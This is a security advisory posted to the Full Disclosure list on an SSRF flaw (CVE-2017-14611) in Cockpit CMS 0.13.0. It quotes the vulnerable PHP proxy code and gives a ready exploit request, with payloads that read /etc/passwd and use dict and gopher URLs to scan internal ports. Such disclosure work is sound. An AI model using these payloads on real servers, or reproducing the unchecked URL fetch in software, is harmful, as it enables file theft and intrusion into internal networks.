CVE-2017-14611: SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

Full Disclosure mailing list archives

From: “service () baimaohui net” <service () baimaohui net>
Date: Wed, 4 Apr 2018 20:50:10 +0800

# SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

The Cockpit CMS is awesome if you need a flexible content structure but don’t want to be limited in how to use the content.

Product Download: https://getcockpit.com/

Vulnerability Type：SSRF（Server Side Request Forgery）

Attack Type : Remote

Vulnerability Description

Cockpit CMS uses a `fetch_url_contents` （https://github.com/aheinze/fetch_url_contents）project code on github website, This Project has SSRF Vulnerability，So affect the system.

The vulnerability code（/assets/lib/fuc.js.php）:

if (isset($\_REQUEST\['url'\])) {

    // allow only query from same host
    echo(parse\_url($\_SERVER\['HTTP\_REFERER'\],PHP\_URL\_HOST));

    if ($\_SERVER\['HTTP\_HOST'\] != parse\_url($\_SERVER\['HTTP\_REFERER'\], PHP\_URL\_HOST)) {
        header('HTTP/1.0 401 Unauthorized');
        return;
    }

    $url     = $\_REQUEST\['url'\];
    $content = '';

    if (function\_exists('curl\_exec')){
        $conn = curl\_init($url);
        curl\_setopt($conn, CURLOPT\_SSL\_VERIFYPEER, true);
        curl\_setopt($conn, CURLOPT\_FRESH\_CONNECT,  true);
        curl\_setopt($conn, CURLOPT\_RETURNTRANSFER, 1);
        curl\_setopt($conn,CURLOPT\_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like 

Gecko) Chrome/24.0.1312.52 Safari/537.17’); curl_setopt($conn, CURLOPT_AUTOREFERER, true); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_VERBOSE, 0); $content = curl_exec($conn); curl_close($conn); } if (!$content && function_exists(‘file_get_contents’)){ $content = @file_get_contents($url); } if (!$content && function_exists(‘fopen’) && function_exists(‘stream_get_contents’)){ $handle = @fopen ($url, “r”); $content = @stream_get_contents($handle); }

    if (!$content) {
        header('HTTP/1.0 503 Service Unavailable');
    }

    return print($content);
}

Exploit

GET /assets/lib/fuc.js.php?url=dict://127.0.0.1:3306 HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 

Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8 referer:http://127.0.0.1/index.php

modify the above url parameter，example，file:

request http(s) protocol: url=http(s)://www.google.com

file read：url=file:///etc/passwd or url=file:///c:/windows/win.ini

If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols method，if not then only use http、https、ftp protocol

scan prot,example: url=dict://127.0.0.1:3306 use gopher protocol: url=gopher://127.0.0.1:3306

If the curl function is unavailable,this vulnerability trigger need allow\_url\_fopen option is enable in php.ini，allow\_url\_fopen option defualt is enable.

Versions

Cockpit 0.13.0

Impact

SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read，scan network port，information detection,internal network server attack.

Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)

References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14611

_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

• SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611) service () baimaohui net (Apr 06)